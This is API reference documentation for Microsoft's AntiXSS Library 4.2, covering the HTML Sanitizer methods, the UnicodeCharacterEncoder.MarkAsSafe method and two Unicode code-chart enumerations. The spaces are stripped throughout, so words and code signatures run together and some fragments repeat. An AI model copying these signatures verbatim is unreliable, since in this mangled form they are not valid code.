GetSafeHtmlFragment(TextReader,Stream)

SanitizesinputHTMLfragmentforsafedisplayonbrowser.

GetSafeHtmlFragment(TextReader,TextWriter)

SanitizesinputHTMLfragmentforsafedisplayonbrowser.

SeeAlso

SanitizerClassMicrosoft.Security.ApplicationNamespace

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

SanitizerMethodsSanitizerClassSeeAlso

Methods

Name DescriptionGetSafeHtml(String) SanitizesinputHTML

documentforsafedisplayonbrowser.

GetSafeHtml(TextReader,Stream) SanitizesinputHTMLdocumentforsafedisplayonbrowser.

GetSafeHtml(TextReader,TextWriter)

SanitizesinputHTMLdocumentforsafedisplayonbrowser.

GetSafeHtmlFragment(String) SanitizesinputHTMLfragmentforsafedisplayonbrowser.

GetSafeHtmlFragment(TextReader,Stream)

SanitizesinputHTMLfragmentforsafedisplayonbrowser.

GetSafeHtmlFragment(TextReader,TextWriter)

SanitizesinputHTMLfragmentforsafedisplayonbrowser.

SeeAlso

SanitizerClassMicrosoft.Security.ApplicationNamespace

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

Sanitizer.GetSafeHtmlMethodSanitizerClassSeeAlso

OverloadList

Name DescriptionGetSafeHtml(String) SanitizesinputHTMLdocumentfor

safedisplayonbrowser.GetSafeHtml(TextReader,Stream)

SanitizesinputHTMLdocumentforsafedisplayonbrowser.

GetSafeHtml(TextReader,TextWriter)

SanitizesinputHTMLdocumentforsafedisplayonbrowser.

SeeAlso

SanitizerClassSanitizerMembersMicrosoft.Security.ApplicationNamespace

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

Sanitizer.GetSafeHtmlMethod(String)SanitizerClassSeeAlso

SanitizesinputHTMLdocumentforsafedisplayonbrowser.

Namespace:Microsoft.Security.ApplicationAssembly:HtmlSanitizationLibrary(inHtmlSanitizationLibrary.dll)Version:4.2.0.0

Syntax

C#

publicstaticstringGetSafeHtml(

stringinput

)

VisualBasic

PublicSharedFunctionGetSafeHtml(_

inputAsString_

)AsString

VisualC++

public:

staticString^GetSafeHtml(

String^input

)

ParametersinputType:System.StringMaliciousHTMLDocument

ReturnValueAsantiziedHTMLdocument

RemarksThemethodtransformsandfiltersHTMLofexecutablescripts.AsafelistoftagsandattributesareusedtostripdangerousscriptsfromtheHTML.HTMLisalsonormalizedwheretagsareproperlyclosedandattributesareproperlyformatted.

SeeAlso

SanitizerClassGetSafeHtmlOverloadMicrosoft.Security.ApplicationNamespace

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

Sanitizer.GetSafeHtmlMethod(TextReader,Stream)SanitizerClassSeeAlso

SanitizesinputHTMLdocumentforsafedisplayonbrowser.

Namespace:Microsoft.Security.ApplicationAssembly:HtmlSanitizationLibrary(inHtmlSanitizationLibrary.dll)Version:4.2.0.0

Syntax

C#

publicstaticvoidGetSafeHtml(

TextReadersourceReader,

StreamdestinationStream

)

VisualBasic

PublicSharedSubGetSafeHtml(_

sourceReaderAsTextReader,_

destinationStreamAsStream_

)

VisualC++

public:

staticvoidGetSafeHtml(

TextReader^sourceReader,

Stream^destinationStream

)

ParameterssourceReaderType:System.IO.TextReaderSourcetextreaderwithmaliciousHTMLdestinationStreamType:System.IO.StreamStreamtowritesafeHTML

RemarksThemethodtransformsandfiltersHTMLofexecutablescripts.AsafelistoftagsandattributesareusedtostripdangerousscriptsfromtheHTML.HTMLisalsonormalizedwheretagsareproperlyclosedandattributesareproperlyformatted.

SeeAlso

SanitizerClassGetSafeHtmlOverloadMicrosoft.Security.ApplicationNamespace

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

Sanitizer.GetSafeHtmlMethod(TextReader,TextWriter)SanitizerClassSeeAlso

SanitizesinputHTMLdocumentforsafedisplayonbrowser.

Namespace:Microsoft.Security.ApplicationAssembly:HtmlSanitizationLibrary(inHtmlSanitizationLibrary.dll)Version:4.2.0.0

Syntax

C#

publicstaticvoidGetSafeHtml(

TextReadersourceReader,

TextWriterdestinationWriter

)

VisualBasic

PublicSharedSubGetSafeHtml(_

sourceReaderAsTextReader,_

destinationWriterAsTextWriter_

)

VisualC++

public:

staticvoidGetSafeHtml(

TextReader^sourceReader,

TextWriter^destinationWriter

)

ParameterssourceReaderType:System.IO.TextReaderSourcetextreaderwithmaliciousHTMLdestinationWriterType:System.IO.TextWriterTextWritertowritesafeHTML

RemarksThemethodtransformsandfiltersHTMLofexecutablescripts.AsafelistoftagsandattributesareusedtostripdangerousscriptsfromtheHTML.HTMLisalsonormalizedwheretagsareproperlyclosedandattributesareproperlyformatted.

SeeAlso

SanitizerClassGetSafeHtmlOverloadMicrosoft.Security.ApplicationNamespace

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

Sanitizer.GetSafeHtmlFragmentMethodSanitizerClassSeeAlso

OverloadList

Name DescriptionGetSafeHtmlFragment(String) SanitizesinputHTML

fragmentforsafedisplayonbrowser.

GetSafeHtmlFragment(TextReader,Stream)

SanitizesinputHTMLfragmentforsafedisplayonbrowser.

GetSafeHtmlFragment(TextReader,TextWriter)

SanitizesinputHTMLfragmentforsafedisplayonbrowser.

SeeAlso

SanitizerClassSanitizerMembersMicrosoft.Security.ApplicationNamespace

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

Sanitizer.GetSafeHtmlFragmentMethod(String)SanitizerClassSeeAlso

SanitizesinputHTMLfragmentforsafedisplayonbrowser.

Namespace:Microsoft.Security.ApplicationAssembly:HtmlSanitizationLibrary(inHtmlSanitizationLibrary.dll)Version:4.2.0.0

Syntax

C#

publicstaticstringGetSafeHtmlFragment(

stringinput

)

VisualBasic

PublicSharedFunctionGetSafeHtmlFragment(_

inputAsString_

)AsString

VisualC++

public:

staticString^GetSafeHtmlFragment(

String^input

)

ParametersinputType:System.StringMaliciousHTMLfragment

ReturnValueSafeHTMLfragment

RemarksThemethodtransformsandfiltersHTMLofexecutablescripts.AsafelistoftagsandattributesareusedtostripdangerousscriptsfromtheHTML.HTMLisalsonormalizedwheretagsareproperlyclosedandattributesareproperlyformatted.

SeeAlso

SanitizerClassGetSafeHtmlFragmentOverloadMicrosoft.Security.ApplicationNamespace

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

Sanitizer.GetSafeHtmlFragmentMethod(TextReader,Stream)SanitizerClassSeeAlso

SanitizesinputHTMLfragmentforsafedisplayonbrowser.

Namespace:Microsoft.Security.ApplicationAssembly:HtmlSanitizationLibrary(inHtmlSanitizationLibrary.dll)Version:4.2.0.0

Syntax

C#

publicstaticvoidGetSafeHtmlFragment(

TextReadersourceReader,

StreamdestinationStream

)

VisualBasic

PublicSharedSubGetSafeHtmlFragment(_

sourceReaderAsTextReader,_

destinationStreamAsStream_

)

VisualC++

public:

staticvoidGetSafeHtmlFragment(

TextReader^sourceReader,

Stream^destinationStream

)

ParameterssourceReaderType:System.IO.TextReaderSourcetextreaderwithmaliciousHTMLdestinationStreamType:System.IO.StreamStreamtowritesafeHTML

RemarksThemethodtransformsandfiltersHTMLofexecutablescripts.AsafelistoftagsandattributesareusedtostripdangerousscriptsfromtheHTML.HTMLisalsonormalizedwheretagsareproperlyclosedandattributesareproperlyformatted.

SeeAlso

SanitizerClassGetSafeHtmlFragmentOverloadMicrosoft.Security.ApplicationNamespace

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

Sanitizer.GetSafeHtmlFragmentMethod(TextReader,TextWriter)SanitizerClassSeeAlso

SanitizesinputHTMLfragmentforsafedisplayonbrowser.

Namespace:Microsoft.Security.ApplicationAssembly:HtmlSanitizationLibrary(inHtmlSanitizationLibrary.dll)Version:4.2.0.0

Syntax

C#

publicstaticvoidGetSafeHtmlFragment(

TextReadersourceReader,

TextWriterdestinationWriter

)

VisualBasic

PublicSharedSubGetSafeHtmlFragment(_

sourceReaderAsTextReader,_

destinationWriterAsTextWriter_

)

VisualC++

public:

staticvoidGetSafeHtmlFragment(

TextReader^sourceReader,

TextWriter^destinationWriter

)

ParameterssourceReaderType:System.IO.TextReaderSourcetextreaderwithmaliciousHTMLdestinationWriterType:System.IO.TextWriterStreamtowritesafeHTML

RemarksThemethodtransformsandfiltersHTMLofexecutablescripts.AsafelistoftagsandattributesareusedtostripdangerousscriptsfromtheHTML.HTMLisalsonormalizedwheretagsareproperlyclosedandattributesareproperlyformatted.

SeeAlso

SanitizerClassGetSafeHtmlFragmentOverloadMicrosoft.Security.ApplicationNamespace

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

UnicodeCharacterEncoderClassMembersSeeAlso

ProvidesHTMLencodingmethods.

Namespace:Microsoft.Security.ApplicationAssembly:AntiXssLibrary40(inAntiXssLibrary40.dll)Version:4.2.0.0

Syntax

C#

publicstaticclassUnicodeCharacterEncoder

VisualBasic

PublicNotInheritableClassUnicodeCharacterEncoder

VisualC++

publicrefclassUnicodeCharacterEncoderabstractsealed

InheritanceHierarchySystem.ObjectMicrosoft.Security.Application.UnicodeCharacterEncoder

SeeAlso

UnicodeCharacterEncoderMembersMicrosoft.Security.ApplicationNamespace

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

UnicodeCharacterEncoderMembersUnicodeCharacterEncoderClassMethodsSeeAlso

TheUnicodeCharacterEncodertypeexposesthefollowingmembers.

Methods

Name DescriptionMarkAsSafe Markscharactersfromthespecified

languagesassafe.

SeeAlso

UnicodeCharacterEncoderClassMicrosoft.Security.ApplicationNamespace

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

UnicodeCharacterEncoderMethodsUnicodeCharacterEncoderClassSeeAlso

TheUnicodeCharacterEncodertypeexposesthefollowingmembers.

Methods

Name DescriptionMarkAsSafe Markscharactersfromthespecified

languagesassafe.

SeeAlso

UnicodeCharacterEncoderClassMicrosoft.Security.ApplicationNamespace

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

UnicodeCharacterEncoder.MarkAsSafeMethodUnicodeCharacterEncoderClassSeeAlso

Markscharactersfromthespecifiedlanguagesassafe.

Namespace:Microsoft.Security.ApplicationAssembly:AntiXssLibrary40(inAntiXssLibrary40.dll)Version:4.2.0.0

Syntax

C#

publicstaticvoidMarkAsSafe(

LowerCodeChartslowerCodeCharts,

LowerMidCodeChartslowerMidCodeCharts,

MidCodeChartsmidCodeCharts,

UpperMidCodeChartsupperMidCodeCharts,

UpperCodeChartsupperCodeCharts

)

VisualBasic

PublicSharedSubMarkAsSafe(_

lowerCodeChartsAsLowerCodeCharts,_

lowerMidCodeChartsAsLowerMidCodeCharts,_

midCodeChartsAsMidCodeCharts,_

upperMidCodeChartsAsUpperMidCodeCharts,_

upperCodeChartsAsUpperCodeCharts_

)

VisualC++

public:

staticvoidMarkAsSafe(

LowerCodeChartslowerCodeCharts,

LowerMidCodeChartslowerMidCodeCharts,

MidCodeChartsmidCodeCharts,

UpperMidCodeChartsupperMidCodeCharts,

UpperCodeChartsupperCodeCharts

)

Parameters

lowerCodeChartsType:Microsoft.Security.Application.LowerCodeChartsThecombinationoflowercodechartstouse.lowerMidCodeChartsType:Microsoft.Security.Application.LowerMidCodeChartsThecombinationoflowermidcodechartstouse.midCodeChartsType:Microsoft.Security.Application.MidCodeChartsThecombinationofmidcodechartstouse.upperMidCodeChartsType:Microsoft.Security.Application.UpperMidCodeChartsThecombinationofuppermidcodechartstouse.upperCodeChartsType:Microsoft.Security.Application.UpperCodeChartsThecombinationofuppercodechartstouse.

RemarksThesafelistaffectsallHTMLandXMLencodingfunctions.

SeeAlso

UnicodeCharacterEncoderClassMicrosoft.Security.ApplicationNamespace

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

UpperCodeChartsEnumerationSeeAlso

ValuesfortheuppersectionoftheUTF8Unicodecodetables,fromUA8E0toUFFFD

Namespace:Microsoft.Security.ApplicationAssembly:AntiXssLibrary40(inAntiXssLibrary40.dll)Version:4.2.0.0

Syntax

C#

[FlagsAttribute]

publicenumUpperCodeCharts

VisualBasic

<FlagsAttribute>_

PublicEnumerationUpperCodeCharts

VisualC++

[FlagsAttribute]

publicenumclassUpperCodeCharts

Members

Membername Value DescriptionNone 0 Nocodechartsfrom

theupperregionoftheUnicodetablesaresafe-listed.

DevanagariExtended 1 TheDevanagariExtendedcodetable.

KayahLi 2 TheKayahLicodetable.

Rejang 4 TheRejangcodetable.

HangulJamoExtendedA 8 TheHangulJamoExtended-Acodetable.

Javanese 16 TheJavanesecodetable.

Cham 32 TheChamcodetable.MyanmarExtendedA 64 TheMyanmar

Extended-Acodetable.

TaiViet 128 TheTaiVietcodetable.

MeeteiMayek 256 TheMeeteiMayekcodetable.

HangulSyllables 512 TheHangulSyllablescodetable.

HangulJamoExtendedB 1024 TheHangulJamoExtended-Bcodetable.

CjkCompatibilityIdeographs 2048 TheCJKCompatibilityIdeographscodetable.

AlphabeticPresentationForms 4096 TheAlphabeticPresentationFormscodetable.

ArabicPresentationFormsA 8192 TheArabicPresentationForms-Acodetable.

VariationSelectors 16384 TheVariationSelectorscodetable.

VerticalForms 32768 TheVerticalFormscodetable.

CombiningHalfMarks 65536 TheCombiningHalfMarkscodetable.

CjkCompatibilityForms 131072 TheCJKCompatibilityFormscodetable.

SmallFormVariants 262144 TheSmallFormVariantscodetable.

ArabicPresentationFormsB 524288 TheArabicPresentationForms-Bcodetable.

HalfWidthAndFullWidthForms 1048576 ThehalfwidthandfullwidthFormscodetable.

Specials 2097152 TheSpecialscodetable.

SeeAlso

Microsoft.Security.ApplicationNamespace

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

UpperMidCodeChartsEnumerationSeeAlso

ValuesfortheuppermiddlesectionoftheUTF8Unicodecodetables,fromU2DE0toUA8DF

Namespace:Microsoft.Security.ApplicationAssembly:AntiXssLibrary40(inAntiXssLibrary40.dll)Version:4.2.0.0

Syntax

C#

[FlagsAttribute]

publicenumUpperMidCodeCharts

VisualBasic

<FlagsAttribute>_

PublicEnumerationUpperMidCodeCharts

VisualC++

[FlagsAttribute]

publicenumclassUpperMidCodeCharts

Members

Membername Value DescriptionNone 0 Nocodecharts

fromthelowerregionoftheUnicodetablesaresafe-listed.

CyrillicExtendedA 1 TheCyrillicExtended-Acodetable.

SupplementalPunctuation 2 TheSupplementalPunctuationcodetable.

CjkRadicalsSupplement 4 TheCJKRadicialsSupplementcodetable.

KangxiRadicals 8 TheKangxiRadicialscodetable.

IdeographicDescriptionCharacters 16 TheIdeographicDescriptionCharacterscodetable.

CjkSymbolsAndPunctuation 32 TheCJKSymbolsandPunctuationcodetable.

Hiragana 64 TheHiraganacodetable.

Katakana 128 TheKatakanacodetable.

Bopomofo 256 TheBopomofo

codetable.HangulCompatibilityJamo 512 TheHangul

CompatbilityJamocodetable.

Kanbun 1024 TheKanbuncodetable.

BopomofoExtended 2048 TheBopomofuExtendedcodetable.

CjkStrokes 4096 TheCJKStrokescodetable.

KatakanaPhoneticExtensions 8192 TheKatakanaPhoneticExtensoinscodetable.

EnclosedCjkLettersAndMonths 16384 TheEnclosedCJKLettersandMonthscodetable.

CjkCompatibility 32768 TheCJKCompatibilitycodetable.

CjkUnifiedIdeographsExtensionA 65536 TheCJKUnifiedIdeographsExtensionAcodetable.

YijingHexagramSymbols 131072 TheYijingHexagramSymbolscodetable.

CjkUnifiedIdeographs 262144 TheCJKUnifiedIdeographs

codetable.YiSyllables 524288 TheYi

Syllablescodetable.

YiRadicals 1048576 TheYiRadicalscodetable.

Lisu 2097152 TheLisucodetable.

Vai 4194304 TheVaicodetable.

CyrillicExtendedB 8388608 TheCyrillicExtended-Bcodetable.

Bamum 16777216 TheBamumcodetable.

ModifierToneLetters 33554432 TheModifierToneLetterscodetable.

LatinExtendedD 67108864 TheLatinExtended-Dcodetable.

SylotiNagri 134217728 TheSylotiNagricodetable.

CommonIndicNumberForms 268435456 TheCommonIndicNumberFormscodetable.

Phagspa 536870912 ThePhags-pacodetable.

Saurashtra 1073741824 TheSaurashtracodetable.

SeeAlso

Microsoft.Security.ApplicationNamespace

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.